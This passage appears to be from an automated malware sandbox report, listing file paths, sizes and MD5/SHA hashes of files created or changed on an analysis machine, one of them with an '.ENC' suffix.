MD507ac8571846ca0cc9f6fcdbe1d000be2
SHA13cbe16f7d24d40b590f97b1999c64c5bb889e8c6
SHA2562a3bcea7cadf94c65d4462b2297285078f5232e84267dfa641cb23475ffdb1b5
SHA51256413d14e5ee2e615c19232d93047c9d2cc422e083eda0f9f5ae1dc04798989e73d5ad80e06a7dda166deb0177206fb1ed045773bba3975667c12409d67d1e7e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Microsoft\Speech\Files\UserLexicons\SP_A12EFCF326EF474CB6F8D2D8326C18EA.dat
Filesize940B
MD5327c6861fe1331f8387f06c2754f74c2
SHA13ebb3551dfe005d0bc6368d1b7e2e50f01290629
SHA2567a4f8fa033dc22fe00ef62928000259d293199c7ae33c00afe62484f374dca92
SHA512cd86aa64036214b44137aabbdad86269999b44a48d846e8a6011035a5284d7ba043942a42daea5d8f2658775edee0f663e8c50f8c016fba3e53b5adbc76b39b2
-
Filesize
723B
MD5553cf6c7e10d1c701098d7e1d0a01839
SHA13cbdf41c6d02de51754a2696a382485be5175771
SHA256bfbb59fa451071b37088b6286c3e5941f2536c4d9a1b77c1c6e987da9545b6ae
SHA512591ace58027c743e663598f29857e3fa52e47e5a015dfb5e46570fcc563b623306b6e9de5df0aed2f5242c7ae88178aced6c909ec3b8c075b5d7239922d3183c
-
C:\Users\Admin\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000001.regtrans-ms.ENC
Filesize16B
MD550714cb8845c9eadfec7d3cccf421dc5
SHA16d9c00dbe17ee1b30c654ec804c4b71d31d6d356
SHA256205e016904fcf9b58ab35c8d74a8919e29676d10cadb35439007a256041c2288
SHA5127866ccb665b3d0847feb3f33a5d7b3c6a70ade281f7eff6a76a5c49c668d4a930c6802a57addd551f9a962752e52db0b28c80b1e173cb89f097e1af5c93cfbaf